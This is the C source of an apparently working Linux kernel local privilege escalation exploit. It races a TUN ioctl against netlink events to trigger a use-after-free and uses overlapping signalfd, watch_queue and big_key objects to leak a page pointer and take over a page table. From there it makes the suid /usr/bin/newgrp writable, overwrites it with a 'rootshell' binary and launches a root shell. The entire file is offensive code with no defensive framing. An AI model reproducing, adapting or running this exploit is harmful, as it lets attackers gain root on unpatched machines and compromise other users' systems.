#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdbool.h>
#include <errno.h>
#include <err.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
//#include <keyutils.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/signalfd.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <linux/if.h>
#include <linux/netlink.h>
//#include <linux/watch_queue.h>
#include <linux/if_tun.h>
#include <linux/keyctl.h>

#ifndef IOC_WATCH_QUEUE_SET_SIZE
#define IOC_WATCH_QUEUE_SET_SIZE	_IO('W', 0x60)
#endif

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

void pin_to(int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cset));
}

/*
static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}
*/

// value must have bits 8 and 18 set
static int signalfd_encoded(int fd, unsigned long value) {
  unsigned long encoded_value = ~value;
  if (encoded_value & ( (1<<(SIGKILL-1)) | (1<<(SIGSTOP-1)) ))
    errx(1, "unable to encode value 0x%lx", value);
  return SYSCHK(syscall(__NR_signalfd4, fd, &encoded_value, sizeof(encoded_value), SFD_CLOEXEC));
}

static unsigned long fdinfo_parse(int fdinfo_fd) {
  char buf[0x1000];
  int len = SYSCHK(pread(fdinfo_fd, buf, sizeof(buf)-1, 0));
  buf[len] = '\0';
  char *p = strstr(buf, "sigmask:\t");
  if (p == NULL)
    errx(1, "weird fdinfo");
  p += 9;
  unsigned long encoded_value = strtoul(p, NULL, 16);
  return ~encoded_value;
}

static int ROOT_DEBUG = 0;
static void debug_stack(int debug_fd, char *debug_stack) {
  if (ROOT_DEBUG) {
    int len = SYSCHK(pread(debug_fd, debug_stack, 0x1000-1, 0));
    debug_stack[len] = '\0';
  } else {
    debug_stack[0] = '\0';
  }
}
#define DEBUG_STACK(_debug_fd, _name) \
  char _name[0x1000];                 \
  debug_stack((_debug_fd), _name);

static int netlink = -1;

static void netlink_rcv() {
  char buf[0x1000];
  while (1) {
    int res = SYSCHK(read(netlink, buf, 0x1000));
    if (memmem(buf, res, "net/default", 11) != NULL)
      break;
  }
}

/* trigger the bug and make two overlapping signalfds */
void trigger_bug(int *outfd1, int *outfd2, int *outinfo1) {
  int ready_fd = SYSCHK(eventfd(0, EFD_CLOEXEC|EFD_SEMAPHORE));

  int parent_debug_fd = -1;
  if (ROOT_DEBUG) {
    parent_debug_fd = SYSCHK(open("/proc/self/stack", O_RDONLY));
  }

  int tun = SYSCHK(open("/dev/net/tun", O_RDWR|O_CLOEXEC));

  pid_t child = SYSCHK(fork());
  if (child == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
    if (getppid() == 1) _exit(0);
    usleep(1000);
    sched_yield();
    sched_yield();
    sched_yield();

    struct sched_param sp = { .sched_priority = 0 };
    SYSCHK(sched_setscheduler(0, SCHED_IDLE, &sp));
    struct ifreq ifr = { .ifr_name = "default", .ifr_flags = IFF_TUN };
    ioctl(tun, TUNSETIFF, &ifr);
    DEBUG_STACK(parent_debug_fd, parent_stack);

    SYSCHK(eventfd_write(ready_fd, 1));
    sleep(1);
    if (ROOT_DEBUG) {
      printf("parent stack after tun ioctl:\n%s\n", parent_stack);
    }
    while (1) pause();
  }

  int debug_fd;
  if (ROOT_DEBUG) {
    char debug_path[100];
    sprintf(debug_path, "/proc/%d/stack", child);
    debug_fd = SYSCHK(open(debug_path, O_RDONLY));
  }

  netlink_rcv();

  DEBUG_STACK(debug_fd, netlink_rcv_stack);

  ioctl(tun, TUNSETNOCSUM, NULL);
  DEBUG_STACK(debug_fd, rtnl_synced_stack);

  /* realloc 1 */
  int realloc1_fds[40];
  for (unsigned long i=0; i<sizeof(realloc1_fds)/sizeof(int); i++)
    realloc1_fds[i] = SYSCHK(signalfd_encoded(-1, (i<<32) | 0x13371337UL));
  DEBUG_STACK(debug_fd, first_realloced);

  //TODO
  //struct sched_param sp = { .sched_priority = 0 };
  //SYSCHK(sched_setscheduler(child, SCHED_OTHER, &sp));

  if (ROOT_DEBUG) {
    printf("stack at netlink receive:\n%s\n", netlink_rcv_stack);
    printf("stack after RTNL sync:\n%s\n", rtnl_synced_stack);
    printf("stack after first realloc:\n%s\n", first_realloced);
  }

  eventfd_t dummy_ev;
  SYSCHK(eventfd_read(ready_fd, &dummy_ev));
  DEBUG_STACK(debug_fd, eventfd_stack);

  /* realloc 2 */
  int realloc2_fds[40];
  for (unsigned long i=0; i<sizeof(realloc2_fds)/sizeof(int); i++)
    realloc2_fds[i] = SYSCHK(signalfd_encoded(-1, (i<<32) | 0xffffffffUL));
  DEBUG_STACK(debug_fd, second_realloced);


  if (ROOT_DEBUG) {
/*
    printf("stack at netlink receive:\n%s\n", netlink_rcv_stack);
    printf("stack after RTNL sync:\n%s\n", rtnl_synced_stack);
    printf("stack after first realloc:\n%s\n", first_realloced);
*/
  }

  for (unsigned long i=0; i<sizeof(realloc2_fds)/sizeof(int); i++) {
    char info_path[100];
    sprintf(info_path, "/proc/self/fdinfo/%d", realloc2_fds[i]);
    int info_fd = SYSCHK(open(info_path, O_RDONLY|O_CLOEXEC));
    unsigned long val = fdinfo_parse(info_fd);
    if (val != ((i<<32) | 0xffffffffUL)) {
      printf("ERROR: corrupted realloc2_fds[%lu] = 0x%lx - HANGING\n", i, val);
      while (1) pause();
    }
    close(info_fd);
  }
  int realloc1_idx = -1;
  int realloc2_idx = -1;
  int info_fd_1 = -1;
  for (unsigned long i=0; i<sizeof(realloc1_fds)/sizeof(int); i++) {
    char info_path[100];
    sprintf(info_path, "/proc/self/fdinfo/%d", realloc1_fds[i]);
    int info_fd = SYSCHK(open(info_path, O_RDONLY|O_CLOEXEC));
    unsigned long val = fdinfo_parse(info_fd);
    if (val == ((i<<32) | 0x13371337UL)) {
      close(info_fd);
      continue;
    }
    unsigned long corrupt_idx = val>>32;
    if ((val&0xffffffff) != 0xffffffffUL || corrupt_idx >= sizeof(realloc2_fds)/sizeof(int)) {
      printf("ERROR: corrupted realloc1_fds[%lu] = 0x%lx - HANGING\n", i, val);
      while(1) pause();
    }
    /* don't log here to avoid creating unnecessary contention, except for errors */
    if (realloc2_idx != -1) {
      printf("ERROR: realloc1_fds[%lu] (%lu) also corrupted on top of realloc1_fds[%d] (%d) - HANGING\n",
             i, corrupt_idx, realloc1_idx, realloc2_idx);
      while(1) pause();
    }
    realloc1_idx = i;
    realloc2_idx = corrupt_idx;
    info_fd_1 = info_fd;
  }
  if (realloc2_idx == -1) {
    printf("ERROR: failed to reuse both copies of the object - HANGING\n");
    while (1) pause();
  }

  /* free unused objects to reduce the chance something will bust the active slab */
  for (int i=0; i<sizeof(realloc1_fds)/sizeof(int); i++)
    if (i != realloc1_idx) close(realloc1_fds[i]);
  for (int i=0; i<sizeof(realloc2_fds)/sizeof(int); i++)
    if (i != realloc2_idx) close(realloc2_fds[i]);
  printf("REALLOC OK: realloc1_fds[%d] reused by realloc2_fds[%d]\n", realloc1_idx, realloc2_idx);
  *outfd1 = realloc1_fds[realloc1_idx];
  *outfd2 = realloc2_fds[realloc2_idx];
  *outinfo1 = info_fd_1;
}

int main(void) {
  setbuf(stdout, NULL);

  /* avoid hitting pagefaults during race */
  {
    FILE *maps = fopen("/proc/self/maps", "r");
    if (maps == NULL)
      err(1, "fopen maps");
    char *line = NULL;
    size_t line_len = 0;
    while (getline(&line, &line_len, maps) != -1) {
      unsigned long start, end;
      char access;
      if (strchr(line, '/') == NULL)
        continue;
      if (sscanf(line, "%lx-%lx %c", &start, &end, &access) != 3)
        continue;
      if (access != 'r')
        continue;
      printf("preloading from %lx to %lx\n", start, end);
      for (unsigned long addr=start; addr<end; addr+=0x1000)
        *(volatile char *)addr;
    }
  }

  int shell_evfd = SYSCHK(eventfd(0, EFD_CLOEXEC));
  pid_t shell_child = SYSCHK(fork());
  if (shell_child == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
    if (getppid() == 1) _exit(0);

    eventfd_t dummy;
    SYSCHK(eventfd_read(shell_evfd, &dummy));

    system("/usr/bin/newgrp"); /* spawn root shell */
    printf("WARNING: not terminating to avoid page double-free\n");
    exit(0);
  }

  pin_to(0); /* pin parent+child to cpu 0 */

  SYSCHK(unshare((ROOT_DEBUG?0:CLONE_NEWUSER)|CLONE_NEWNET));

  /* 1GiB-aligned virtual address range without THP */
  char *pt_area = SYSCHK(mmap(NULL, 2*512*512*0x1000UL, PROT_READ|PROT_WRITE,
                              MAP_NORESERVE|MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  pt_area = (char*)(  ((unsigned long)pt_area + 512*512*0x1000)  &  ~((512*512*0x1000UL)-1)  );
  SYSCHK(madvise(pt_area, 512*512*0x1000, MADV_NOHUGEPAGE));
  /* populate pud */
  *(volatile char *)(pt_area + 512*512*0x1000 - 1);

  unsigned long big_key_id = SYSCHK(syscall(__NR_add_key, "big_key", "012345678",
                                            "012345678", 9, KEY_SPEC_THREAD_KEYRING));

  int rootshell_fd = SYSCHK(open("rootshell", O_RDONLY));
  struct stat rootshell_st;
  SYSCHK(fstat(rootshell_fd, &rootshell_st));
  if (rootshell_st.st_size > 0x1000)
    errx(1, "rootshell binary too big");

  netlink = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT));
  struct sockaddr_nl addr = { .nl_family = AF_NETLINK, .nl_groups = -1 };
  SYSCHK(bind(netlink, (struct sockaddr *)&addr, sizeof(addr)));

  int flush_fds[800];
  for (int i=0; i<sizeof(flush_fds)/sizeof(int); i++)
    flush_fds[i] = SYSCHK(signalfd_encoded(-1, 0xbadbad00ffffffffUL));
  for (int i=0; i<sizeof(flush_fds)/sizeof(int); i++)
    close(flush_fds[i]);

  int realloc1_fd, realloc2_fd, info_fd_1;

  /*
   * indiana_jones_egg_swap.gif
   * percpu freelists are basically deterministic LIFO if you're fast enough
   * and don't touch too many objects, right?
   */
  /*
   * PHASE 1: use watchqueue/signalfd overlap to leak page*,
   * then turn the page into a page table
   */
  trigger_bug(&realloc1_fd, &realloc2_fd, &info_fd_1);
  int pipefds1[2];
  SYSCHK(pipe2(pipefds1, O_EXCL));
  close(pipefds1[0]);
  close(realloc2_fd); /* free kmalloc-8 */
  SYSCHK(ioctl(pipefds1[1], IOC_WATCH_QUEUE_SET_SIZE, 1)); /* realloc kmalloc-8 */
  unsigned long page_ptr = fdinfo_parse(info_fd_1);
  if ((page_ptr & 0xff00000000000000ul) != 0xff00000000000000ul) {
    printf("ERROR: failed to reallocate as watch_queue pages array: 0x%lx - HANGING\n", page_ptr);
    while (1) pause();
  }
  close(pipefds1[1]); /* LEAK kmalloc-8 and free page */
  for (int i=0; i<8; i++)
    *(volatile char *)(pt_area + i*512*0x1000); /* realloc page as pagetable */
  close(realloc1_fd);
  close(info_fd_1);
  printf("page pointer: 0x%lx\n", page_ptr);
  printf("consuming netlink messages... ");
  // add rx, add tx, remove rx, remove tx, remove dev
  for (int i=0; i<5; i++) {
    netlink_rcv();
    printf("+");
  }
  printf("\n");

  /*
   * PHASE 2: use watchqueue/big_key overlap to insert the leaked pagetable as
   * watchqueue page again, then release the watchqueue to free the pagetable,
   * and reuse the pagetable as pipe page
   */
  trigger_bug(&realloc1_fd, &realloc2_fd, &info_fd_1);
  int pipefds2[2];
  SYSCHK(pipe2(pipefds2, O_EXCL));
  close(pipefds2[0]);
  int pipefds3[8][2];
  for (int i=0; i<8; i++) {
    SYSCHK(pipe2(pipefds3[i], O_NONBLOCK|O_CLOEXEC));
    SYSCHK(fcntl(pipefds3[i][0], F_SETPIPE_SZ, 8*0x1000));
  }
  close(realloc2_fd); /* free kmalloc-8 */
  SYSCHK(ioctl(pipefds2[1], IOC_WATCH_QUEUE_SET_SIZE, 1)); /* realloc kmalloc-8 */
  int push_extra = SYSCHK(signalfd_encoded(-1, 0xb1ab1ab1affffff)); /* create extra kmalloc-8 */
  close(realloc1_fd); /* free kmalloc-8 */
  close(push_extra); /* free extra kmalloc-8 */
  /* reuse extra kmalloc-8 (temporary) and kmalloc-8 (persistent) */
  //unsigned long page_ptr = 0xbadbeef;
  SYSCHK(syscall(__NR_keyctl, KEYCTL_UPDATE, big_key_id, &page_ptr, sizeof(page_ptr), 0));
#if 0
  unsigned long clobbered_page_ptr = fdinfo_parse(info_fd_1); //TODO remove
  printf("clobbered value: 0x%lx\n", clobbered_page_ptr); // TODO remove
  while(1)pause();
#endif
  close(pipefds2[1]); /* free kmalloc-8 (no longer needed) and pagetable */

  char zeroes_buf[0x1000] = {0};
  for (int i=0; i<8; i++)
    SYSCHK(write(pipefds3[i][1], zeroes_buf, 0x1000));
  printf("PROGRESS: pipe/pagetable page reuse should be complete? Testing...\n");

  int pte_i;
  int pipe_i;
  unsigned long marker_pte;
  char page_buf[0x1000];
  for (pte_i=0; pte_i<8; pte_i++) {
    *(volatile char *)(pt_area + pte_i*512*0x1000 + 0x1000); /* create PTE marker */
    for (pipe_i=0; pipe_i < 8; pipe_i++) {
      assert(SYSCHK(read(pipefds3[pipe_i][0], page_buf, 0x1000)) == 0x1000);
      marker_pte = ((unsigned long *)page_buf)[1];
      SYSCHK(write(pipefds3[pipe_i][1], zeroes_buf, 0x1000));
      if (marker_pte != 0)
        goto pipe_hit;
    }
  }
  printf("ERROR: failed to set up pipe/pagetable overlap - HANGING\n");
  while (1) pause();
pipe_hit:;
  printf("SUCCESS: pipe/pagetable overlap achieved, pte(zeropage)=0x%016lx at pte_i=%d pipe_i=%d\n", marker_pte, pte_i, pipe_i);

  int suid_fd = SYSCHK(open("/usr/bin/newgrp", O_RDONLY));
  char *ro_vaddr = pt_area + pte_i*512*0x1000 + 0x2000;
  SYSCHK(mmap(ro_vaddr, 0x1000, PROT_READ, MAP_SHARED|MAP_FIXED, suid_fd, 0));
  unsigned char elf_hdr_char = *(volatile unsigned char *)ro_vaddr;
  printf("ELF header first byte: %02hhx\n", elf_hdr_char);
  assert(elf_hdr_char == 0x7f);
  assert(SYSCHK(read(pipefds3[pipe_i][0], page_buf, 0x1000)) == 0x1000);
  unsigned long *ro_pte = ((unsigned long *)page_buf) + 2;
  if ((*ro_pte) == 0) {
    printf("ERROR: RO pte didn't show up???\n");
    while (1) pause();
  }
  printf("original RO PTE: 0x%lx\n", *ro_pte);
  if (ROOT_DEBUG) {
    int pagemap_fd = SYSCHK(open("/proc/self/pagemap", O_RDONLY));
    unsigned long pe;
    assert(SYSCHK(pread(pagemap_fd, &pe, sizeof(pe), (unsigned long)ro_vaddr / 0x1000 * 8)) == sizeof(pe));
    printf("pagemap sees physical address 0x%lx\n", (pe & ((1UL<<55)-1)));
    close(pagemap_fd);
  }
  *ro_pte |= 0x2UL/*writable*/ | 0x40UL/*dirty*/;
  printf("modifying PTE:   0x%lx\n", *ro_pte);
  SYSCHK(write(pipefds3[pipe_i][1], page_buf, 0x1000));
  printf("PROGRESS: should have write access now.\n");
  if (ROOT_DEBUG) {
    int pagemap_fd = SYSCHK(open("/proc/self/pagemap", O_RDONLY));
    unsigned long pe;
    assert(SYSCHK(pread(pagemap_fd, &pe, sizeof(pe), (unsigned long)ro_vaddr / 0x1000 * 8)) == sizeof(pe));
    printf("pagemap sees physical address 0x%lx\n", (pe & ((1UL<<55)-1)));
    close(pagemap_fd);
  }
  printf("trying to clobber...\n");
  // NOTE: there might still be a stale RO TLB entry, and we
  // don't want to get killed by the kernel's page fault handling
  // for that.
  for (int i=0; true; i++) {
    int res = pread(rootshell_fd, ro_vaddr, rootshell_st.st_size, 0);
    if (res == rootshell_st.st_size)
      break;
    if (i >= 10) {
      printf("ERROR: trying to clobber failed, no write access - HANGING\n");
      while (1) pause();
    }
    if (res != -1) {
      printf("incomplete write? retry...\n");
      continue;
    }
    if (errno == EFAULT) {
      printf("stale TLB entry (cleared by #PF)? retry...\n");
    } else {
      printf("unexpected errno (%m) - retry...\n");
    }
  }
  printf("SUCCESS: clobbered suid binary. reverting PTE...\n");
  assert(SYSCHK(read(pipefds3[pipe_i][0], page_buf, 0x1000)) == 0x1000);
  printf("readback PTE:    0x%lx\n", *ro_pte);
  *ro_pte &= ~(0x2UL/*writable*/ | 0x40UL/*dirty*/);
  printf("reverted PTE:    0x%lx\n", *ro_pte);
  SYSCHK(write(pipefds3[pipe_i][1], page_buf, 0x1000));
  printf("SUCCESS: reverted PTE. only broken state left should be the uncounted page ref.\n");
  printf("PROGRESS: trying to launch root shell...\n");
  SYSCHK(eventfd_write(shell_evfd, 1));

  while(1) pause();
}
